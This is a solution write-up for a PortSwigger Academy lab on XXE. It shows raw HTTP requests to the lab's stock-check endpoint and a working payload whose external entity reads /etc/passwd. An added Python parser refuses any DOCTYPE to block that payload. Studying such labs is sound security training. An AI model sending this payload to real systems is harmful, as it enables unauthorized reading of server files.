PortSwigger: Exploiting XXE using external entities
Exploiting XXE using external entities to retrieve files
Solution
Open the website: https://0a1a001604bc92f481af8fd000da005c.web-security-academy.net/product?productId=1
GET /product?productId=1 HTTP/2
Host: 0a1a001604bc92f481af8fd000da005c.web-security-academy.net
Cookie: session=d8I1hPMaxzbGJKYcGVe5GJDlGhGwlurM
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a1a001604bc92f481af8fd000da005c.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Check stock for productId=1
POST /product/stock HTTP/2
Host: 0a1a001604bc92f481af8fd000da005c.web-security-academy.net
Cookie: session=d8I1hPMaxzbGJKYcGVe5GJDlGhGwlurM
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a1a001604bc92f481af8fd000da005c.web-security-academy.net/product?productId=1
Content-Type: application/xml
Content-Length: 107
Origin: https://0a1a001604bc92f481af8fd000da005c.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

<?xml version="1.0" encoding="UTF-8"?><stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>
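Create a payload
Goal: read the file /etc/passwd. The DOCTYPE declares an external entity named xxe whose SYSTEM identifier is file:///etc/passwd, and productId references it as &xxe; so the XML parser substitutes the file contents into that field.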
---
Payload
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
---
POST /product/stock HTTP/2
Host: 0a1a001604bc92f481af8fd000da005c.web-security-academy.net
Cookie: session=d8I1hPMaxzbGJKYcGVe5GJDlGhGwlurM
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a1a001604bc92f481af8fd000da005c.web-security-academy.net/product?productId=1
Content-Type: application/xml
Content-Length: 175
Origin: https://0a1a001604bc92f481af8fd000da005c.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
Solved
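
Added example (not part of the original write-up or of the lab's code): a server-side parser for the stockCheck body that refuses any DOCTYPE, so the xxe entity in the payload above can never be declared. The names parse_stock_check and RejectedXML, and the rule that both IDs are short decimal numbers, are assumptions made for illustration.

```python
import re
import xml.parsers.expat as expat

# parse_stock_check / RejectedXML are illustrative names, not the lab's code.
# Bodies copied from the two POST /product/stock requests on this page.
BENIGN = (b'<?xml version="1.0" encoding="UTF-8"?><stockCheck>'
          b'<productId>1</productId><storeId>1</storeId></stockCheck>')
XXE_BODY = (b'<?xml version="1.0" encoding="UTF-8"?>\n'
            b'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>\n'
            b'<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>')


class RejectedXML(ValueError):
    """The stock-check body was refused before any field was used."""


def parse_stock_check(body: bytes) -> dict:
    """Parse a <stockCheck> body; refuse DTDs, extra elements, non-numeric IDs."""
    fields, stack, text = {}, [], []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # The request format needs no DTD, so no entity can ever be declared.
        raise RejectedXML("DOCTYPE not allowed")

    def on_start(name, attrs):
        stack.append(name)
        text.clear()

    def on_end(name):
        if len(stack) == 2 and stack[0] == "stockCheck":
            fields[name] = "".join(text)  # direct child of the root
        stack.pop()
        text.clear()

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = text.append
    try:
        parser.Parse(body, True)
    except expat.ExpatError as exc:  # malformed XML or undeclared entity
        raise RejectedXML(f"malformed XML: {exc}") from exc

    if set(fields) != {"productId", "storeId"}:
        raise RejectedXML("unexpected or missing elements")
    for key, value in fields.items():
        if not re.fullmatch(r"[0-9]{1,9}", value):
            raise RejectedXML(f"{key} must be a short decimal number")
    return {key: int(value) for key, value in fields.items()}
```

The DOCTYPE handler fires before the entity declaration is processed, so the request is refused without the file:// URI ever being resolved.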